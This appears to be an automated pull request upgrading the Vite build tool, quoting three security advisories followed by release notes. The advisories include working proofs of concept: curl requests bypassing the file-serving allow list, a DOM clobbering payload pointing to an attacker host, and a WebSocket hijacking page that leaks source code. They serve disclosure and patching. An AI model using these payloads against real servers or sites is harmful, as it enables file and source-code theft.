chore(deps): update dependency vite to v4 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Adoption	Passing	Confidence
vite (source)	^2.9.13 -> ^4.5.6

GitHub Vulnerability Alerts

CVE-2024-45811

Summary

The contents of arbitrary files can be returned to the browser.

Details

@fs denies access to files outside of Vite serving allow list. Adding ?import&raw to the URL bypasses this limitation and returns the file content if it exists.

PoC

$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

$ echo "top secret content" > /tmp/secret.txt

# expected behaviour
$ curl "http://localhost:5173/@​fs/tmp/secret.txt"

    <body>
      <h1>403 Restricted</h1>
      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.

# security bypassed
$ curl "http://localhost:5173/@&#8203;fs/tmp/secret.txt?import&raw"
export default "top secret content\n"
//# sourceMappingURL=data:application/json;base64,eyJ2...

CVE-2024-45812

Summary

We discovered a DOM Clobbering vulnerability in Vite when building scripts to cjs/iife/umd output format. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present.

Note that, we have identified similar security issues in Webpack: GHSA-4vvj-4cpr-p986

Details

Backgrounds

DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:

[1] https://scnps.co/papers/sp23_domclob.pdf
[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/

Gadgets found in Vite

We have identified a DOM Clobbering vulnerability in Vite bundled scripts, particularly when the scripts dynamically import other scripts from the assets folder and the developer sets the build output format to cjs, iife, or umd. In such cases, Vite replaces relative paths starting with __VITE_ASSET__ using the URL retrieved from document.currentScript.

However, this implementation is vulnerable to a DOM Clobbering attack. The document.currentScript lookup can be shadowed by an attacker via the browser's named DOM tree element access mechanism. This manipulation allows an attacker to replace the intended script element with a malicious HTML element. When this happens, the src attribute of the attacker-controlled element is used as the URL for importing scripts, potentially leading to the dynamic loading of scripts from an attacker-controlled server.

const relativeUrlMechanisms = {
  amd: (relativePath) => {
    if (relativePath[0] !== ".") relativePath = "./" + relativePath;
    return getResolveUrl(
      `require.toUrl('${escapeId(relativePath)}'), document.baseURI`
    );
  },
  cjs: (relativePath) => `(typeof document === 'undefined' ? ${getFileUrlFromRelativePath(
    relativePath
  )} : ${getRelativeUrlFromDocument(relativePath)})`,
  es: (relativePath) => getResolveUrl(
    `'${escapeId(partialEncodeURIPath(relativePath))}', import.meta.url`
  ),
  iife: (relativePath) => getRelativeUrlFromDocument(relativePath),
  // NOTE: make sure rollup generate `module` params
  system: (relativePath) => getResolveUrl(
    `'${escapeId(partialEncodeURIPath(relativePath))}', module.meta.url`
  ),
  umd: (relativePath) => `(typeof document === 'undefined' && typeof location === 'undefined' ? ${getFileUrlFromRelativePath(
    relativePath
  )} : ${getRelativeUrlFromDocument(relativePath, true)})`
};

PoC

Considering a website that contains the following main.js script, the devloper decides to use the Vite to bundle up the program with the following configuration.

// main.js
import extraURL from './extra.js?url'
var s = document.createElement('script')
s.src = extraURL
document.head.append(s)

// extra.js
export default "https://myserver/justAnOther.js"

// vite.config.js
import { defineConfig } from 'vite'

export default defineConfig({
  build: {
    assetsInlineLimit: 0, // To avoid inline assets for PoC
    rollupOptions: {
      output: {
        format: "cjs"
      },
    },
  },
  base: "./",
});

After running the build command, the developer will get following bundle as the output.

// dist/index-DDmIg9VD.js
"use strict";const t=""+(typeof document>"u"?require("url").pathToFileURL(__dirname+"/extra-BLVEx9Lb.js").href:new URL("extra-BLVEx9Lb.js",document.currentScript&&document.currentScript.src||document.baseURI).href);var e=document.createElement("script");e.src=t;document.head.append(e);

Adding the Vite bundled script, dist/index-DDmIg9VD.js, as part of the web page source code, the page could load the extra.js file from the attacker's domain, attacker.controlled.server. The attacker only needs to insert an img tag with the name attribute set to currentScript. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.

<!DOCTYPE html>
<html>
<head>
  <title>Vite Example</title>
  <!-- Attacker-controlled Script-less HTML Element starts--!>
  <img name="currentScript" src="https://attacker.controlled.server/"></img>
  <!-- Attacker-controlled Script-less HTML Element ends--!>
</head>
<script type="module" crossorigin src="/assets/index-DDmIg9VD.js"></script>
<body>
</body>
</html>

Impact

This vulnerability can result in cross-site scripting (XSS) attacks on websites that include Vite-bundled files (configured with an output format of cjs, iife, or umd) and allow users to inject certain scriptless HTML tags without properly sanitizing the name or id attributes.

Patch

// https://github.com/vitejs/vite/blob/main/packages/vite/src/node/build.ts#L1296
const getRelativeUrlFromDocument = (relativePath: string, umd = false) =>
  getResolveUrl(
    `'${escapeId(partialEncodeURIPath(relativePath))}', ${
      umd ? `typeof document === 'undefined' ? location.href : ` : ''
    }document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT' && document.currentScript.src || document.baseURI`,
  )

CVE-2025-24010

Summary

Vite allowed any websites to send any requests to the development server and read the response due to default CORS settings and lack of validation on the Origin header for WebSocket connections.

Upgrade Path

Users that does not match either of the following conditions should be able to upgrade to a newer version of Vite that fixes the vulnerability without any additional configuration.

• Using the backend integration feature
• Using a reverse proxy in front of Vite
• Accessing the development server via a domain other than localhost or *.localhost
• Using a plugin / framework that connects to the WebSocket server on their own from the browser

Using the backend integration feature

If you are using the backend integration feature and not setting server.origin, you need to add the origin of the backend server to the server.cors.origin option. Make sure to set a specific origin rather than *, otherwise any origin can access your development server.

Using a reverse proxy in front of Vite

If you are using a reverse proxy in front of Vite and sending requests to Vite with a hostname other than localhost or *.localhost, you need to add the hostname to the new server.allowedHosts option. For example, if the reverse proxy is sending requests to http://vite:5173, you need to add vite to the server.allowedHosts option.

Accessing the development server via a domain other than localhost or *.localhost

You need to add the hostname to the new server.allowedHosts option. For example, if you are accessing the development server via http://foo.example.com:8080, you need to add foo.example.com to the server.allowedHosts option.

Using a plugin / framework that connects to the WebSocket server on their own from the browser

If you are using a plugin / framework, try upgrading to a newer version of Vite that fixes the vulnerability. If the WebSocket connection appears not to be working, the plugin / framework may have a code that connects to the WebSocket server on their own from the browser.

In that case, you can either:

• fix the plugin / framework code to the make it compatible with the new version of Vite
• set legacy.skipWebSocketTokenCheck: true to opt-out the fix for [2] while the plugin / framework is incompatible with the new version of Vite
  • When enabling this option, make sure that you are aware of the security implications described in the impact section of [2] above.

Mitigation without upgrading Vite

[1]: Permissive default CORS settings

Set server.cors to false or limit server.cors.origin to trusted origins.

[2]: Lack of validation on the Origin header for WebSocket connections

There aren't any mitigations for this.

[3]: Lack of validation on the Host header for HTTP requests

Use Chrome 94+ or use HTTPS for the development server.

Details

There are three causes that allowed malicious websites to send any requests to the development server:

[1]: Permissive default CORS settings

Vite sets the Access-Control-Allow-Origin header depending on server.cors option. The default value was true which sets Access-Control-Allow-Origin: *. This allows websites on any origin to fetch contents served on the development server.

Attack scenario:

1. The attacker serves a malicious web page (http://malicious.example.com).
2. The user accesses the malicious web page.
3. The attacker sends a fetch('http://127.0.0.1:5173/main.js') request by JS in that malicious web page. This request is normally blocked by same-origin policy, but that's not the case for the reasons above.
4. The attacker gets the content of http://127.0.0.1:5173/main.js.

[2]: Lack of validation on the Origin header for WebSocket connections

Vite starts a WebSocket server to handle HMR and other functionalities. This WebSocket server did not perform validation on the Origin header and was vulnerable to Cross-Site WebSocket Hijacking (CSWSH) attacks. With that attack, an attacker can read and write messages on the WebSocket connection. Vite only sends some information over the WebSocket connection (list of the file paths that changed, the file content where the errored happened, etc.), but plugins can send arbitrary messages and may include more sensitive information.

Attack scenario:

1. The attacker serves a malicious web page (http://malicious.example.com).
2. The user accesses the malicious web page.
3. The attacker runs new WebSocket('http://127.0.0.1:5173', 'vite-hmr') by JS in that malicious web page.
4. The user edits some files.
5. Vite sends some HMR messages over WebSocket.
6. The attacker gets the content of the HMR messages.

[3]: Lack of validation on the Host header for HTTP requests

Unless server.https is set, Vite starts the development server on HTTP. Non-HTTPS servers are vulnerable to DNS rebinding attacks without validation on the Host header. But Vite did not perform validation on the Host header. By exploiting this vulnerability, an attacker can send arbitrary requests to the development server bypassing the same-origin policy.

1. The attacker serves a malicious web page that is served on HTTP (http://malicious.example.com:5173) (HTTPS won't work).
2. The user accesses the malicious web page.
3. The attacker changes the DNS to point to 127.0.0.1 (or other private addresses).
4. The attacker sends a fetch('/main.js') request by JS in that malicious web page.
5. The attacker gets the content of http://127.0.0.1:5173/main.js bypassing the same origin policy.

Impact

[1]: Permissive default CORS settings

Users with the default server.cors option may:

• get the source code stolen by malicious websites
• give the attacker access to functionalities that are not supposed to be exposed externally
  • Vite core does not have any functionality that causes changes somewhere else when receiving a request, but plugins may implement those functionalities and servers behind server.proxy may have those functionalities.

[2]: Lack of validation on the Origin header for WebSocket connections

All users may get the file paths of the files that changed and the file content where the error happened be stolen by malicious websites.

For users that is using a plugin that sends messages over WebSocket, that content may be stolen by malicious websites.

For users that is using a plugin that has a functionality that is triggered by messages over WebSocket, that functionality may be exploited by malicious websites.

[3]: Lack of validation on the Host header for HTTP requests

Users using HTTP for the development server and using a browser that is not Chrome 94+ may:

• get the source code stolen by malicious websites
• give the attacker access to functionalities that are not supposed to be exposed externally
  • Vite core does not have any functionality that causes changes somewhere else when receiving a request, but plugins may implement those functionalities and servers behind server.proxy may have those functionalities.

Chrome 94+ users are not affected for [3], because sending a request to a private network page from public non-HTTPS page is forbidden since Chrome 94.

Related Information

Safari has a bug that blocks requests to loopback addresses from HTTPS origins. This means when the user is using Safari and Vite is listening on lookback addresses, there's another condition of "the malicious web page is served on HTTP" to make [1] and [2] to work.

PoC

[2]: Lack of validation on the Origin header for WebSocket connections

1. I used the react template which utilizes HMR functionality.

npm create vite@latest my-vue-app-react -- --template react

2. Then on a malicious server, serve the following POC html:

<!doctype html>
<html lang="en">
    <head>
        <meta charset="utf-8" />
        <title>vite CSWSH</title>
    </head>
    <body>
        <div id="logs"></div>
        <script>
            const div = document.querySelectorAll('#logs')[0];
            const ws = new WebSocket('ws://localhost:5173','vite-hmr');
            ws.onmessage = event => {
                const logLine = document.createElement('p');
                logLine.innerHTML = event.data;
                div.append(logLine);
            };
        </script>
    </body>
</html>

3. Kick off Vite

npm run dev

4. Load the development server (open http://localhost:5173/) as well as the malicious page in the browser.
5. Edit src/App.jsx file and intentionally place a syntax error
6. Notice how the malicious page can view the websocket messages and a snippet of the source code is exposed

Here's a video demonstrating the POC:

vite-cswsh.mov

---

Release Notes

vitejs/vite (vite)

v4.5.6

Compare Source

This version contains a breaking change due to security fixes. See GHSA-vg6x-rcgg-rjx6 for more details.

Please refer to CHANGELOG.md for details.

v4.5.5

Compare Source

v4.5.3

Compare Source

v4.5.2

Compare Source

Please refer to CHANGELOG.md for details.

v4.5.1

Compare Source

Please refer to CHANGELOG.md for details.

v4.5.0

Compare Source

Please refer to CHANGELOG.md for details.

v4.4.12

Compare Source

Please refer to CHANGELOG.md for details.

v4.4.11

Compare Source

Please refer to CHANGELOG.md for details.

v4.4.10

Compare Source

Please refer to CHANGELOG.md for details.

v4.4.9

Compare Source

• chore: fix eslint warnings (#​14031) (4021a0e), closes #​14031
• chore(deps): update all non-major dependencies (#​13938) (a1b519e), closes #​13938
• fix: dynamic import vars ignored warning (#​14006) (4479431), closes #​14006
• fix(build): silence warn dynamic import module when inlineDynamicImports true (#​13970) (7a77aaf), closes #​13970
• perf: improve build times and memory utilization (#​14016) (9d7d45e), closes #​14016
• perf: replace startsWith with === (#​14005) (f5c1224), closes #​14005

v4.4.8

Compare Source

• fix: modulePreload false (#​13973) (488085d), closes #​13973
• fix: multiple entries with shared css and no JS (#​13962) (89a3db0), closes #​13962
• fix: use file extensions on type imports so they work with moduleResolution: 'node16' (#​13947) (aeef670), closes #​13947
• fix(css): enhance error message for missing preprocessor dependency (#​11485) (65e5c22), closes #​11485
• fix(esbuild): fix static properties transpile when useDefineForClassFields false (#​13992) (4ca7c13), closes #​13992
• fix(importAnalysis): strip url base before passing as safeModulePaths (#​13712) (1ab06a8), closes #​13712
• fix(importMetaGlob): avoid unnecessary hmr of negative glob (#​13646) (844451c), closes #​13646
• fix(optimizer): avoid double-commit of optimized deps when discovery is disabled (#​13865) (df77991), closes #​13865
• fix(optimizer): enable experimentalDecorators by default (#​13981) (f8a5ffc), closes #​13981
• perf: replace startsWith with === (#​13989) (3aab14e), closes #​13989
• perf: single slash does not need to be replaced (#​13980) (66f522c), closes #​13980
• perf: use Intl.DateTimeFormatter instead of toLocaleTimeString (#​13951) (af53a1d), closes #​13951
• perf: use Intl.NumberFormat instead of toLocaleString (#​13949) (a48bf88), closes #​13949
• perf: use magic-string hires boundary for sourcemaps (#​13971) (b9a8d65), closes #​13971
• chore(reporter): remove unnecessary map (#​13972) (dd9d4c1), closes #​13972
• refactor: add new overload to the type of defineConfig (#​13958) (24c12fe), closes #​13958

v4.4.7

Compare Source

• fix: optimizeDeps.include not working with paths inside packages (#​13922) (06e4f57), closes #​13922
• fix: lightningcss fails with html-proxy (#​13776) (6b56094), closes #​13776
• fix: prepend config.base to vite/env path (#​13941) (8e6cee8), closes #​13941
• fix(html): support import.meta.env define replacement without quotes (#​13425) (883089c), closes #​13425
• fix(proxy): handle error when proxy itself errors (#​13929) (4848e41), closes #​13929
• chore(eslint): allow type annotations (#​13920) (d1264fd), closes #​13920

v4.4.6

Compare Source

• fix: constrain inject helpers for iife (#​13909) (c89f677), closes #​13909
• fix: display manualChunks warning only when a function is not used (#​13797) (#​13798) (51c271f), closes #​13797 #​13798
• fix: do not append browserHash on optimized deps during build (#​13906) (0fb2340), closes #​13906
• fix: use Bun's implementation of ws instead of the bundled one (#​13901) (049404c), closes #​13901
• feat(client): add guide to press Esc for closing the overlay (#​13896) (da389cc), closes #​13896

v4.4.5

Compare Source

• fix: "EISDIR: illegal operation on a directory, realpath" error on RA… (#​13655) (6bd5434), closes #​13655
• fix: transform error message add file info (#​13687) (6dca41c), closes #​13687
• fix: warn when publicDir and outDir are nested (#​13742) (4eb3154), closes #​13742
• fix(build): remove warning about ineffective dynamic import from node_modules (#​13884) (33002dd), closes #​13884
• fix(build): style insert order for UMD builds (fix #​13668) (#​13669) (49a1b99), closes #​13668 #​13669
• fix(deps): update all non-major dependencies (#​13872) (975a631), closes #​13872
• fix(types): narrow down the return type of defineConfig (#​13792) (c971f26), closes #​13792
• chore: fix typos (#​13862) (f54e8da), closes #​13862
• chore: replace any with string (#​13850) (4606fd8), closes #​13850
• chore(deps): update dependency prettier to v3 (#​13759) (5a56941), closes #​13759
• docs: fix build.cssMinify link (#​13840) (8a2a3e1), closes #​13840

v4.4.4

Compare Source

• chore: warning about ssr cjs format removal (#​13827) (4646e9f), closes #​13827
• fix(esbuild): enable experimentalDecorators by default (#​13805) (e8880f0), closes #​13805
• fix(scan): skip tsconfigRaw fallback if tsconfig is set (#​13823) (b6155a1), closes #​13823
• feat(client): close vite-error-overlay with Escape key (#​13795) (85bdcda), closes #​13795

v4.4.3

Compare Source

• fix: avoid early error when server is closed in ssr (#​13787) (89d01eb), closes #​13787
• fix(deps): update all non-major dependencies (#​13758) (8ead116), closes #​13758
• fix(server): remove restart guard on restart (#​13789) (2a38ef7), closes #​13789

v4.4.2

Compare Source

• fix(css): use single postcss instance (#​13738) (c02fac4), closes #​13738

v4.4.1

Compare Source

• fix: revert #​13073, use consistent virtual module ID in module graph (#​13734) (f589ac0), closes #​13073 #​13734
• fix: revert import config module as data (#​13731) (b0bfa01), closes #​13731
• chore: changelog notes and clean for 4.4 (#​13728) (3f4e36e), closes #​13728

v4.4.0

Compare Source

Experimental support for Lightning CSS

Starting from Vite 4.4, there is experimental support for Lightning CSS. You can opt into it by adding css.transformer: 'lightningcss' to your config file and install the optional lightningcss dev dependency. If enabled, CSS files will be processed by Lightning CSS instead of PostCSS.

Lightning CSS can also be used as the CSS minifier with build.cssMinify: 'lightningcss'.

See beta docs at the Lighting CSS guide.

esbuild 0.18 update

esbuild 0.18 contains backwards-incompatible changes to esbuild's handling of tsconfig.json files. We think they shouldn't affect Vite users, you can review #​13525 for more information.

Templates for Solid and Qwik in create-vite

New starter templates have been added to create-vite for Solid and Qwik. Try them online at vite.new/solid-ts and vite.new/qwik-ts.

Korean Translation

Vite's docs are now translated to Korean, available at ko.vitejs.dev.

Features

• feat: preview mode add keyboard shortcuts (#​12968) (126e93e), closes #​12968
• feat: asset type add apng (#​13294) (a11b6f6), closes #​13294
• feat: emit event to handle chunk load errors (#​12084) (2eca54e), closes #​12084
• feat: import public non-asset URL (#​13422) (3a98558), closes #​13422
• feat: support files for fs.allow (#​12863) (4a06e66), closes #​12863
• feat(build): warn dynamic import module with a static import alongside (#​12850) (127c334), closes #​12850
• feat(client): add debounce on page reload (#​13545) (d080b51), closes #​13545
• feat(client): add WebSocket connections events (#​13334) (eb75103), closes #​13334
• feat(config): friendly ESM file require error (#​13283) (b9a6ba0), closes #​13283
• feat(css): add support for Lightning CSS (#​12807) (c6c5d49), closes #​12807
• feat(css): support at import preprocessed styles (#​8400) (2bd6077), closes #​8400
• feat(html): support image set in inline style (#​13473) (2c0faba), closes #​13473
• feat(importMetaGlob): support sub imports pattern (#​12467) (e355c9c), closes #​12467
• feat(optimizer): support glob includes (#​12414) (7792515), closes #​12414
• feat!: update esbuild to 0.18.2 (#​13525) (ab967c0), closes #​13525

Bug Fixes

• fix: check document before detect script rel (#​13559) (be4b0c0), closes #​13559
• fix(define): stringify object parse error in build mode (#​13600) (71516db), closes #​13600
• fix(deps): update all non-major dependencies (#​13701) (02c6bc3), closes #​13701
• fix(esbuild): use useDefineForClassFields: false when no compilerOptions.target is declared (#​13 (7ef2472), closes #​13708
• fix(pluginContainer): drop previous sourcesContent (#​13722) (9310b3a), closes #​13722
• fix: lightningCSS should load external URL in CSS file (#​13692) (8517645), closes #​13692
• fix: shortcut open browser when set host (#​13677) (6f1c55e), closes #​13677
• fix(cli): convert the sourcemap option to boolean (fix #​13638) (#​13663) (d444bfe), closes #​13638 #​13663
• fix(css): use esbuild legalComments config when minifying CSS (#​13661) (2d9008e), closes #​13661
• fix(sourcemap): preserve original sourcesContent (#​13662) (f6362b6), closes #​13662
• fix(ssr): transform superclass identifier (#​13635) (c5b2c8f), closes #​13635
• fix: show error position (#​13623) (90271a6), closes #​13623
• fix(hmr): only invalidate lastHMRTimestamp of importers if the invalidated module is not a HMR bou (1143e0b), closes #​13024
• fix(indexHtml): decode html URI (#​13581) (f8868af), closes #​13581
• fix: avoid binding ClassExpression (#​13572) (1a0c806), closes #​13572
• fix: the shortcut fails to open browser when set the host (#​13579) (e0a48c5), closes #​13579
• fix(proxy): forward SSE close event (#​13578) (4afbccb), closes #​13578
• fix: allow using vite as a proxy for another vite server (#​13218) (711dd80), closes #​13218
• fix: await requests to before server restart (#​13262) (0464398), closes #​13262
• fix: esm detection with export const { A, B } pattern (#​13483) (ea1bcc9), closes #​13483
• fix: keep track of ssr version of imported modules separately (#​11973) (8fe6952), closes #​11973
• fix: make optimize error available to meta-framework (#​13495) (b70e783), closes #​13495
• fix: only show the listened IP when host is specified (#​13412) (20b0cae), closes #​13412
• fix: race condition creation module in graph in transformRequest (#​13085) (43cbbcf), closes #​13085
• fix: remove deprecated config.server.base (#​13482) (dc597bd), closes #​13482
• fix: remove extra path shorten when resolving from a dir (#​13381) (5503198), closes #​13381
• fix: show network URLs when --host 0.0.0.0 (#​13438) (00ee8c1), closes #​13438
• fix: timestamp config dynamicImport (#​13502) (6a87c65), closes #​13502
• fix: unexpected config temporary file (#​13269) (ff3ce31), closes #​13269
• fix: use consistent virtual module ID in module graph (#​13073) (aa1776f), closes #​13073
• fix(build): make output warning message clearer (#​12924) (54ab3c8), closes #​12924
• fix(debug): import performance from perf_hooks (#​13464) (d458ccd), closes #​13464
• fix(deps): update all non-major dependencies (#​13059) (123ef4c), closes #​13059
• fix(deps): update all non-major dependencies (#​13488) (bd09248), closes #​13488
• fix(deps): update sirv to 2.0.3 (#​13057) (d814d6c), closes #​13057
• fix(mergeConfig): don't accept callback config (#​13135) (998512b), closes #​13135
• fix(optimizer): include exports for css modules (#​13519) (1fd9919), closes #​13519
• fix(resolve): always use module condition (#​13370) (367920b), closes #​13370
• fix(ssr): fix crash when a pnpm/Yarn workspace depends on a CJS package (#​9763) (9e1086b), closes #​9763

Previous Changelogs

4.4.0-beta.4 (2023-07-03)

See 4.4.0-beta.4 changelog

4.4.0-beta.3 (2023-06-25)

See 4.4.0-beta.3 changelog

4.4.0-beta.2 (2023-06-22)

See 4.4.0-beta.2 changelog

4.4.0-beta.1 (2023-06-21)

See 4.4.0-beta.1 changelog

4.4.0-beta.0 (2023-06-20)

See 4.4.0-beta.0 changelog

v4.3.9

Compare Source

• fix: fs.deny with leading double slash (#​13348) (813ddd6), closes #​13348
• fix: optimizeDeps during build and external ids (#​13274) (e3db771), closes #​13274
• fix(css): return deps if have no postcss plugins (#​13344) (28923fb), closes #​13344
• fix(legacy): style insert order (#​13266) (e444375), closes #​13266
• chore: revert prev release commit (2a30a07)
• release: v4.3.9 (5c9abf7)
• docs: optimizeDeps.needsInterop (#​13323) (b34e79c), closes #​13323
• test: respect commonjs options in playgrounds (#​13273) (19e8c68), closes #​13273
• refactor: simplify SSR options' if statement (#​13254) (8013a66), closes #​13254
• perf(ssr): calculate stacktrace offset lazily (#​13256) (906c4c1), closes #​13256

v4.3.8

Compare Source

• fix: avoid outdated module to crash in importAnalysis after restart (#​13231) (3609e79), closes #​13231
• fix(ssr): skip updateCjsSsrExternals if legacy flag disabled (#​13230) (13fc345), closes #​13230

v4.3.7

Compare Source

• fix: revert only watch .env files in envDir (#​12587) (#​13217) (0fd4616), closes #​12587 #​13217
• fix(assetImportMetaUrl): allow ternary operator in template literal urls (#​13121) (d5d9a31), closes #​13121

v4.3.6

Compare Source

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.